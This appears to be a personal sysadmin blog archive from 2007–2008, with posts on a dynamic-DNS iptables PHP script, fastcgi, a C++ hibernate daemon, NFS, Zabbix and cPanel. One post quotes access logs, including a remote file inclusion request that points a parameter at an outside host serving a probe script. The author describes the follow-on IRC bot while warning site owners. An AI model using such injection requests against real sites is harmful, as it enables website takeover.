Archive for the ‘System Administration’ Category

Dynamic DNS Iptables Firewall Script

Thursday, October 9th, 2008

I’m using my computer as a development platform and I usually let people in by editing my firewall active table

but for those with dynamic ip addresses I had to figure out a different solution

so I made a small script in PHP to check for my friends dynamic ip address by looking up his dyndns.org hostname

it checks IP then goes sleeping for 5 minutes

when it detects an ip change it updates firewall by flushing my firends chain and adding a rule to let him access my webserver

this script works in my firewall iptables setup, it could work on yours but you have to be smart and figure that out for yourself, I’m not giving any guaranteess for this, use it as GPL V3 code :)
if you want me to help you set it up, just contact me

here’s the code:

#!/usr/bin/php
<?php
/*
use this code as GPL V3 licence says
Copyright (C) 2008, Miroslav Madzarevic, All Rights Reserved
*/
$old_ip = '';

while (1) {

    sleep (300);

    $host = 'friend.dyndns.org';

    if (!preg_match('/^'.$host.' has address ((?:\d{1,3}\.){3}\d{1,3})$/',
           exec ("/usr/bin/host $host"), $matches)) {
        echo "IP problems\n";
        continue;
    }

    $ip = $matches[1];

    $ip_parts = preg_split ('/\./', $ip, -1, PREG_SPLIT_NO_EMPTY);

    if (count($ip_parts) != 4) {
        echo "wrong ip parts count\n";
        exit;
    }

    $good = array();

    foreach ($ip_parts as $ip_part) {
        $ip_part = (int) $ip_part;
        if ($ip_part < 1 or $ip_part > 254) {
            echo "wrong ip part, $ip_part\n";
            exit;
        }
        $good[] = $ip_part;
    }

    $new_ip = join('.', $good);

    if ($old_ip != $new_ip) {

        `/sbin/iptables -F friend`;

        `/sbin/iptables -A friend -s $new_ip/32 -p tcp -m tcp --dport 80 -j ACCEPT`;

        $old_ip = $new_ip;
    }
}

?>
Share and Enjoy: These icons link to social bookmarking sites where readers can share and discover new web pages.
  • Digg
  • Sphinn
  • del.icio.us
  • Facebook
  • Mixx
  • Google
  • Reddit
  • Slashdot
  • StumbleUpon
  • Technorati
  • YahooMyWeb

Posted in Programming, System Administration | No Comments »

fastcgi mod_fcgid

Wednesday, October 1st, 2008

I’ve been playing a little on my cPanel hosting trying to get maximum speed while also enforcing security at running php scripts

I first started with security running mod_suphp and while it worked fine it lacked the speed of the DSO php (mod_php)

so I read a thing or two about fastcgi and enabled it

I’m pleasantly surprised by the speed of the hosting

each user got its own persistent php application running requests (actually it’s limited to 500 php requests per php5 process by MaxRequestsPerProcess 500 directive)

I’m keeping an eye about the memory consumption but I hope I’ll be able to keep running with this setup

and while I got php running as the actuall cPanel user, apache is still running as nobody for other requests… hmmm… I’m using apache 2.2 with MPM Prefork… maybe I should try a different MPM?

Share and Enjoy: These icons link to social bookmarking sites where readers can share and discover new web pages.
  • Digg
  • Sphinn
  • del.icio.us
  • Facebook
  • Mixx
  • Google
  • Reddit
  • Slashdot
  • StumbleUpon
  • Technorati
  • YahooMyWeb

Posted in Software, System Administration | No Comments »

C++ Hibernate Daemon

Wednesday, April 30th, 2008

I use Fluxbox window manager on Ubuntu Linux where I don’t have all the bells and whistles of GNOME or KDE.

so I thought I’d make myself a daemon program that will automatically put my computer to hibernate when my laptop battery is almost empty

usually I take care that my battery doesn’t get to the red zone but this is for those few cases I forget

I wrote this small programm in C++

why c++

well because I don’t programm in c++ and I found it interesting to do so :)

main.cpp looks like this

so, you see the locations of the info and state file for the laptop battery, the percent at which we go to hibernation (I’ve set it to 12%), and the sleep interval before checking the battery state again (10 seconds)

I use my own hibernate script but you could use something like /usr/sbin/hibernate

you can change all of these

in the main function you can se that:

  • we work only as a root user
  • we daemonize (detach from the terminal and run in background)
  • instantiate a worker class object
  • and do our work :)

and what is our work? check out this picture

worker.cpp

well we get the battery total capacity and current capacity and then we calculate the percent

if the percent is less that what I want (12%) then I want my laptop to go to hibernaton

but I also made a security check (that you can remove if you like)

that makes sure my laptop doesn’t go twice into hibernation in succession

why did I do that?

well because I parse data from some files I have no influence over

and those files can change their format anytime

so this is just a precaution

I have a simple makefile that compiles this code, copies it to /usr/local/bin/medved (medved in my language means a bear and bears hibernate ;) ) and adds an entry to /etc/rc.local so that it starts next time you reboot your box automatically

you can also start it by hand and see how it works before the reboot

and that’s it, now I have a daemon that puts my laptop to hibernation before my battery runs dry

I’ve published the source code under GPL licence version 3

you can get source code here

Share and Enjoy: These icons link to social bookmarking sites where readers can share and discover new web pages.
  • Digg
  • Sphinn
  • del.icio.us
  • Facebook
  • Mixx
  • Google
  • Reddit
  • Slashdot
  • StumbleUpon
  • Technorati
  • YahooMyWeb

Posted in Fun, Programming, System Administration | No Comments »

Internet Bad People

Tuesday, April 15th, 2008

there are bad people everywhere and internet is no exception

wherever there are people, there are good and bad people

lets talk about bad people on the internet misusing osadmin.com

what do they do?

a couple of things

some do referrer poisoning

it’s a technique where they visit your website or just ask for parts of it (images etc.) using fake referrers

why do they do it?

well they hope their website (or their website URL) will turn out in your web statistics software and you’ll click there

they’re just spammers that want you to go there and read an ad or possibly get infected by a virus or similar

next there are people who steal your content

I said on my website that all of this is copyrighted by me

but they have automatic bots, programs, that search the web for blogs and other stuff and steal content

some of them, the more decent ones, just use like 2 lines or so from my website and link to my website

but some of them use all the text from a blog article without mentioning the source

like this one

Host: 70.94.6.217 /mire_blog/wp-includes/images/smilies/icon_smile.gif
Http Code: 200 Date: Apr 14 22:27:48 Http Version: HTTP/1.1 Size in Bytes: 174
Referer: http://weblog.xanga.com/lyudi/652178887/waiting-the-water.html
Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322)

here you see his ip address, the url he tried to open on my website (the smiley icon), date when he did it and the referrer
when you actually go there you see my content without the link to my website but before that, he grays the screen and asks for your email address so he can spam you a bit more
oh yeah, and that user agent (mozilla etc.) is fake also

and then there are those who try to break my website by using wordpress crack programs
they are called script kiddies because they use cracking programs somebody else wrote
most of them are teenagers that instead of getting high by thinking about chicks get high on breaking and destroying other people’s websites ;)

now, here’s an example

/category/rss.php?phpraid_dir=http://mcleanmkting.com/catalog/images/default/iyes.txt??
Http Code: 302 Date: Apr 15 01:28:10 Http Version: HTTP/1.1 Size in Bytes: 468
Referer: -
Agent: libwww-perl/5.808

here you see this client asked for my rss and he provided a parameter called phpraid_dir with the url http://mcleanmkting.com/catalog/images/default/iyes.txt??
that means he tried to use that url as an include file in my website script
that is not a text file but a program, a php file that tries to see which of the shell commands work on my system
in also reports which operating system I am using, disk free space etc.

then, it tries to load a perl script from the url http://mcleanmkting.com/catalog/images/default/hai.txt using various download methods because they don’t know which ones work on my system

this perl script is meant to take over the website and to report to the cracker on IRC so he can use the IRC to control my website ;)

the program accepts instructions from nicks sec or SNapper and it communicates with them via IRC private messaging

it’s got a watcher for milw0rm rss feed, tcp/udp flooder, portscan, log destroyer, emailer etc.

I’m a programmer/sysadmin so those tricks will not be so successful on me/my website as they might be on the others because I update my software and track my website activity

I’ve always been a whitehat, meaning I try to make websites work and I write code to do some work

instead those people are blackhat, crackers trying to destroy your website for their own personal benefit

and they’re getting worse by the day

I hope this has been informative, check back osadmin.com for more later

Share and Enjoy: These icons link to social bookmarking sites where readers can share and discover new web pages.
  • Digg
  • Sphinn
  • del.icio.us
  • Facebook
  • Mixx
  • Google
  • Reddit
  • Slashdot
  • StumbleUpon
  • Technorati
  • YahooMyWeb

Posted in Freedom, Programming, System Administration | No Comments »

Solaris Express Developer Edition

Monday, January 21st, 2008

Few days ago, I got OpenSolaris DVD from a friend containing various developer tools and I decided to try it out.

The DVD I got is released quarterly and can be found here.

I dediced to try it out. The install process was simple but it lasted forever, I couldn’t believe it was over when it finished. Well actually it wasn’t really finished, because after booting it for the first time it took like 10 minutes to actually start the GUI.

OpenSolaris really isn’t a polished product. At least from a standpoint of a desktop user.

My screen was in the correct resolution, and the nvidia drivers were there but the refresh rate was like 50 Hz instead of 60Hz.

Next, I found out my network card was not working… I searched the internet for VIA Rhine II and found drivers here. Next, I found out resolv.conf file did not even exist ;)

I created one, populated some name servers and set up the default gateway to my router.

But again I was out of luck, dig tool was working but I couldn’t connect to any site on the net. With some googleing I found out I had to copy nsswitch.dns to nsswitch.conf

Wow, talk about a user friendly OS ;)

I found a good package repository run by the Blastwave guys. Check it out.

I named my OpenSolaris Horus. Horus was the Egypt’s Sun God at the time the pharaohs ruled.

Now, I’m running vncserver on Solaris that I use via vncviewer from my Ubuntu GNU/Linux laptop.

Here’s a picture of it through my vncviewer. I’m running fluxbox window manager btw :)

opensol.jpg

Share and Enjoy: These icons link to social bookmarking sites where readers can share and discover new web pages.
  • Digg
  • Sphinn
  • del.icio.us
  • Facebook
  • Mixx
  • Google
  • Reddit
  • Slashdot
  • StumbleUpon
  • Technorati
  • YahooMyWeb

Posted in Freedom, Software, System Administration | No Comments »

NFS

Tuesday, January 8th, 2008

It’s so easy to setup NFS server. I needed NFS so I could export my OGG files to my dbox.

I’m runing Ubuntu.

Here are the commands

root@warlock:/etc# apt-get install portmap nfs-kernel-server

After that, I had to edit my /etc/exports file

root@warlock:/etc# cat /etc/exports
/exports dbox(ro,sync)

And now, whenever I change the contents of /etc/exports I need to do exportfs -ra

Share and Enjoy: These icons link to social bookmarking sites where readers can share and discover new web pages.
  • Digg
  • Sphinn
  • del.icio.us
  • Facebook
  • Mixx
  • Google
  • Reddit
  • Slashdot
  • StumbleUpon
  • Technorati
  • YahooMyWeb

Posted in System Administration | No Comments »

Zabbix

Monday, December 31st, 2007

Zabbix is a network monitoring solution. I used to play with Nagios but I find Zabbix a better product. Simpler to install, easier to use, better web interface.

Zabbix works in a client/server mode. Client is called an agent ;) so on each box you want monitored you install the agent. The server gets installed either with mysql or with postgresql database support. I opted for mysql. The install was done on my laptop Ubuntu. I had some problems early on since my server didn’t see my client.
This was because of the server or client settings that I changed. Since installing both products I noticed a lot of forks/threads in the process list and I wanted to cut down the number of those by editing a config file.
Don’t do that, Zabbix doesn’t like that ;)

Now I got 25 Zabbix instances in my process list

root@warlock:/tmp# ps aux|grep zabbix|grep -v grep|wc -l
25

Anyway, Zabbix looks nice. I can monitor everything related to how my box functions. I had to clone 2 eth0 rules (incoming and outgoing) and make it work for my wireless network. I just changed eth0 to ath0 both times after cloning.

I have to figure out how to send daily reports to my email :)

Share and Enjoy: These icons link to social bookmarking sites where readers can share and discover new web pages.
  • Digg
  • Sphinn
  • del.icio.us
  • Facebook
  • Mixx
  • Google
  • Reddit
  • Slashdot
  • StumbleUpon
  • Technorati
  • YahooMyWeb

Posted in System Administration | No Comments »

Take 4 by Netenberg

Sunday, December 30th, 2007

Today, I got to install a package of programs called Take4 by Netenberg.

You get Fantastico De Luxe (what a fine name ;)), Universina (you’ll never guess what is this for), Click Be! (another fine name) and AccountLab Plus.

*sarcasm start* Wow, it felt great to have these De Luxe, Universal, Plus programs! *sarcasm end*

Universina is actually a template for Cpanel and I don’t like it. Neither does my client

Fantastico is actually the reason we got this bundle, it’s ok but I didn’t see some of the scripts I expected… Maybe I had to install the unstable version to get them…

Click Be! is a tool that won’t work with my php suexec. We’ll see what happens with this one.

And AccountLab plus is already included with Fantastico De Luxe.

Share and Enjoy: These icons link to social bookmarking sites where readers can share and discover new web pages.
  • Digg
  • Sphinn
  • del.icio.us
  • Facebook
  • Mixx
  • Google
  • Reddit
  • Slashdot
  • StumbleUpon
  • Technorati
  • YahooMyWeb

Posted in System Administration | No Comments »

eGroupWare

Wednesday, December 26th, 2007

I’ve setup egroupware before and it works ok, you got various applicaitions, FeLaMiMail (what a strange name) for email. a calendar, address book, document management, project manager, resources, tracker, file manager, and even wiki. That’s a lot of applications. I saw a gallery php script integration module not bundled here, there are probably more applications.

The thing with egroupware is that installation can be quite complicated. I installed from source on CentOS 5 and after fixing numerous things it complained about I got almost lost in the installation process. Once I finished the installation I noticed you can not change the language. The only language available was English and my client wanted German. So I drilled Google for answers and drilled some more and found out I had to install it in German to have German language available later on. WTF! So I did that, and it was not easy since I don’t know German that well and I got it working. Now I can choose only German and English languages…

Share and Enjoy: These icons link to social bookmarking sites where readers can share and discover new web pages.
  • Digg
  • Sphinn
  • del.icio.us
  • Facebook
  • Mixx
  • Google
  • Reddit
  • Slashdot
  • StumbleUpon
  • Technorati
  • YahooMyWeb

Posted in System Administration | No Comments »

cPanel / WebHost Manager

Sunday, December 23rd, 2007

Some time ago, I started doing a project for a webhosting company, Dazelos. We originally thought about using Virtual Hosting Control System short VHCS but we ran into some problems. Then we looked into other options like Plesk and also found some problems. Then we tried cPanel and it worked :)

We used cPanel test licence to try it out on a brand new CentOS 5 box but the bind DNS server had some issues, the domains would not resolve. Upon further inspection I found out that the format of the named.conf file changed in CentOS 5. I modified the file by hand and it worked.

After the testing phase we decided to deploy the setup. The server box is a Dual Core Intel Xeon CPU with 2 gigabytes of RAM, two fast RAID hard drives and a backup hard drive. And it’s fast :)

The beauty of cPanel is that it does security and updates for you. Meaning you can take a vacation and your server box should be running smoothly like when you left it :)

Share and Enjoy: These icons link to social bookmarking sites where readers can share and discover new web pages.
  • Digg
  • Sphinn
  • del.icio.us
  • Facebook
  • Mixx
  • Google
  • Reddit
  • Slashdot
  • StumbleUpon
  • Technorati
  • YahooMyWeb

Posted in System Administration | No Comments »